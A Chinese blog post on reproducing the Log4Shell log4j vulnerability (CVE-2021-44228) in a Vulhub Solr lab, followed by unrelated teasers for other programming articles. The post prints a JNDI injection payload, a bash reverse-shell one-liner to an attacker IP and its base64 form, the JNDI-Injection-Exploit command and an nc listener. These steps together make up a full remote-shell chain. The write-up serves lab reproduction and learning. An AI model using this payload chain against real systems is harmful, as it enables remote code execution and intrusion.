当前位置：首页 > news >正文

【vluhub】log4j注入漏洞 CVE-2021-44228

news 2025/7/3 16:18:50

LOG4介绍

是一个用Java编写的可靠，快速和灵活的日志框架（API），它在Apache软件许可下发布
log4j存在远程代码执行漏洞、受影响版本2.x

部署环境

攻击机环境：192.168.3.180

kail环境：192.168.203.12【NAT转换的】

部署vluhub

具体流程参考其他博主，本文主要讲解在部署vluhub过程中存在的几个问题，作为记录

问题一、apt-get install docker docker-compose，执行失败，下载失败，修改外网下载也失败

获取离线安装包

直通车

Releases · docker/compose · GitHub

具体版本

下载后存储至

赋予执行权限

sudo chmod +x /usr/local/bin/docker-compose

查看版本docker-compose -v

问题二、

wget https://github.com/vulhub/vulhub/archive/master.zip下载失败

手动下载https://github.com/vulhub/vulhub/archive/master.zip

上传解压

unzip vulhub-master.zip

cd vulhub-master

问题三、docker compose up -d执行失败

由于修改vluhub外网导致，需要切换成国内网络

修改内容如下

重启服务

再次执行 docker compose up -d

端口8983搭建成功

地址访问

http://192.168.203.12:8983/solr/admin/cores?action=1

验证是否存在漏洞

DNSLog Platform

替换发送请求

http://192.168.203.12:8983/solr/admin/cores?action=${jndi:ldap://8dyb3y.dnslog.cn}

刷新dns右边这个按钮出现下方内容则存在

bash -i >& /dev/tcp/192.168.3.180/6666 0>&1

反向getshell base64编码

YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjMuMTgwLzY2NjYgMD4mMQ==

获取JNDI包

https://github.com/welk1n/JNDI-Injection-Exploit/releases/tag/v1.0

执行

java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C bash -c "{echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjMuMTgwLzY2NjYgMD4mMQ==}|{base64,-d}|{bash,-i}" -A 192.168.3.180

生成获取ldap内容有用

创建监听nc-lvvp 6666异常由于windwos 没有安装nc需要安装

直通车

netcat 1.11 for Win32/Win64

安装后火绒会报毒，运行

然后在该路径下执行 nc-lvvp 6666

将生成ldap内容复制替换，重新刷新一下接口

http://192.168.203.12:8983/solr/admin/cores?action=${jndi:ldap://192.168.3.180:1389/mjv27z}

getshell了

大概就是这么个流程！

参考：

centos离线安装docker,docker-compose_centos离线安装docker-compose-CSDN博客

Log4j漏洞环境搭建以及复现拿getshell_dockerlog4j环境搭建-CSDN博客

【vluhub】log4j注入漏洞 CVE-2021-44228

LOG4介绍是一个用Java编写的可靠，快速和灵活的日志框架（API），它在Apache软件许可下发布 log4j存在远程代码执行漏洞、受影响版本2.x 部署环境攻击机环境：192.168.3.180 kail环境：192.168.203.12【NAT…...

编程日记 2024/7/24 5:09:13

Redis核心技术与实战学习笔记

Redis核心技术与实战学习笔记最近想沉下心来看下redis，买了蒋德钧老师的《Redis 核心技术与实战》,这里记录一些学习笔记希望能够坚持下去有想一起学习的童鞋，可以点击跳转到文章尾部获取学习资源,仅供学习不要用于任何商业用途!!! redis知识全景图 …...

编程日记 2024/7/24 5:08:12

力扣经典题目之-＞设计循环队列的超详细讲解与实现

一：题目二：思路讲解前提： a：本文采取数组来实现队列去解决题目 b：开辟k1个空间，front指向队首，rear指向队尾的后一个，rear这样会更好的判空和判满以下根据pop和push感受满和空…...

编程日记 2024/7/24 5:07:11

【数据结构】排序算法——Lesson2

Hi~！这里是奋斗的小羊，很荣幸您能阅读我的文章，诚请评论指点，欢迎欢迎 ~~ 💥💥个人主页：奋斗的小羊 💥💥所属专栏：C语言 🚀本系列文章为个人学习…...

编程日记 2024/7/24 5:06:10

Ubuntu编译ffmpeg并添加cmake工程

文章目录前言前提须知为什么要自己编译 FFmpeg前提软件包与工具的安装编译ffmpeg写CMakeList.txt包含ffmpeg到我们项目中总结前言 FFmpeg 是一个领先的多媒体框架，能够解码、编码、转码、复用、解复用、流化、过滤和播放几乎所有人类和机器创造的内容。FFmpeg 包…...

编程日记 2024/7/24 5:03:07

Vue.js[组件(Component)]

什么是: 拥有专属的HTML，CSS，数据的，可重用的页面独立区域一个页面由多个组件聚合而成一个大型的页面在代码层面上，一个组件就是一个可反复使用的自定义标签。 vs jq插件 vs boot组件 boot插件: 虽然可重用，但仍需…...

编程日记 2024/7/24 5:02:05

基于微信小程序+SpringBoot+Vue的校园自助打印系统(带1w+文档)

基于微信小程序SpringBootVue的校园自助打印系统(带1w文档) 基于微信小程序SpringBootVue的校园自助打印系统(带1w文档) 管理信息可以处理复杂的信息从而提高用户的工作效率，减少失误。所以本基于Vue和微信小程序的校园自助打印系统的开发非常有意义，本系…...

编程日记 2024/7/24 5:01:02

1.创建事件过滤器类，在主窗口中安装事件过滤器 class PasteFilter : public QObject {Q_OBJECTpublic:PasteFilter(QObject *parent nullptr) : QObject(parent) {}protected:bool eventFilter(QObject *obj, QEvent *event) override {if (event->type() QEv…...

编程日记 2024/7/24 5:00:02

线上环境服务器CPU飙升排查

前因收到线上服务器CPU使用率100%的告警信息。环境 jdk1.8CentOS Linux ；CentOS Linux 排查查看服务器CPU使用率果然cpu已经达到了100%了命令 top 使用arthas工具使用方式 arthas 执行命令java -jar arthas-boot.jar 然后执行命令 thread 看到有两个…...

编程日记 2024/7/24 4:58:00

unity文字||图片模糊

一.文字模糊 1、增大字体大小后等比缩放快捷键R 2、更改字体渲染模式二.图片模糊 1、更改过滤模式 2、更改格式或者压缩 3、如果只是图片边缘看不清，可以增加canvas/图片的每单位参考像素...

编程日记 2024/7/24 4:56:59

香薰学习笔记

1 喷香水的方法 ChatGPT-4o 学习使用香水是提升个人形象的一个好方法。喷香水的方法如下： 皮肤吸收：香水最好喷在皮肤上，因为皮肤的温度能帮助香水散发出更好的香味。喷在衣服上可能会影响香水的原始味道。脉搏点：将香水喷在脉搏…...

编程日记 2024/7/24 4:53:56

iOS ------ weak的基本原理

1.weak的基本概念 weak弱引用，所引用的对象的引用计数不会加一，引用对象被释放的时候会自动设置为nil多用于解决对象间的相互引用造成内存泄露的循环引用的问题 2.实现原理 Person *object [[Person alloc] init]; id __weak objc object;Runtime维…...

编程日记 2024/7/24 4:52:55

实时更新UI界面

1.处理实时通信，几种方案 1：当一个用户发送一条需要实时更新的信息，我可以直接查找在线用户，通过在线用户来进行判断条件，发送更新请求 2：用户在一个需要实时更新的界面时，就不断的向服务端发…...

编程日记 2024/7/24 4:48:52

为什么Spring不推荐@Autowired用于字段注入

背景 Spring是Java程序员常用的框架之一。官方从Spring 4.0开始不推荐使用Autowired进行字段注入。 Spring注入方式基于构造器注入：在构造器上使用Autowired。优点：可以声明字段为final，确保字段在构造时被初始化。基于setter方法注入&…...

编程日记 2024/7/24 4:47:51

【北京迅为】《i.MX8MM嵌入式Linux开发指南》-第三篇嵌入式Linux驱动开发篇-第三十九章 Linux MISC驱动

i.MX8MM处理器采用了先进的14LPCFinFET工艺，提供更快的速度和更高的电源效率;四核Cortex-A53，单核Cortex-M4，多达五个内核 ，主频高达1.8GHz，2G DDR4内存、8G EMMC存储。千兆工业级以太网、MIPI-DSI、USB HOST、WIFI/BT…...

编程日记 2024/7/24 4:46:50

基于MobileNetv2的垃圾分类函数式自动微分-昇思25天打卡

基于MobileNetv2的垃圾分类本文档主要介绍垃圾分类代码开发的方法。通过读取本地图像数据作为输入，对图像中的垃圾物体进行检测，并且将检测结果图片保存到文件中。 1、实验目的了解熟悉垃圾分类应用代码的编写（Python语言）&a…...

编程日记 2024/7/24 4:37:43

STM32CubeIDE（CAN）

目录一、概念 1、简述 2、CAN 的几种模式二、实践 1、环回模式轮询通信 1.1 软件配置 1.2 代码编写 2、环回模式中断通信 2.1 软件配置 2.2 代码编写一、概念 1、简述 STM32微控制器系列包含多个型号，其中一些型号集成了CAN（Controller Are…...

编程日记 2024/7/24 4:36:42

GO Channel使用详解（各种场景下的最佳实践）

GO Channel使用详解（各种场景下的最佳实践）一个知识点：通过反射的方式执行 select 语句，在处理很多的 case clause，尤其是不定长的 case clause 的时候，非常有用。而且，在后面介绍任务编排的实现时，我也会采用这种方法，所以，我先带你具体学习下 Channel 的反射用法…...

编程日记 2024/7/24 4:31:37

SwiftUI 5.0（iOS 17）滚动视图的滚动目标行为（Target Behavior）解惑和实战

概览在 SwiftUI 的开发过程中我们常说：“屏幕不够，滚动来凑”。可见滚动视图对于超长内容的呈现有着多么秉轴持钧的重要作用。这不，从 SwiftUI 5.0（iOS 17）开始苹果又为滚动视图增加了全新的功能。但是官方的示例可…...

编程日记 2024/7/24 4:30:37

picker 构建记录

picker 构建记录 tomlinuxtom:~/openverify/picker$ cd picker bash: cd: picker: 没有那个文件或目录 tomlinuxtom:~/openverify/picker$ export BUILD_XSPCOMM_SWIGpython tomlinuxtom:~/openverify/picker$ make rm -rf temp build /home/tom/Tools/verible-v0.0-3724/bin/…...

编程日记 2024/7/24 4:28:35

SpringBoot-17-MyBatis动态SQL标签之常用标签

文章目录 1 代码1.1 实体User.java1.2 接口UserMapper.java1.3 映射UserMapper.xml1.3.1 标签if1.3.2 标签if和where1.3.3 标签choose和when和otherwise1.4 UserController.java2 常用动态SQL标签2.1 标签set2.1.1 UserMapper.java2.1.2 UserMapper.xml2.1.3 UserController.ja…...

编程新知 2025/7/1 20:24:44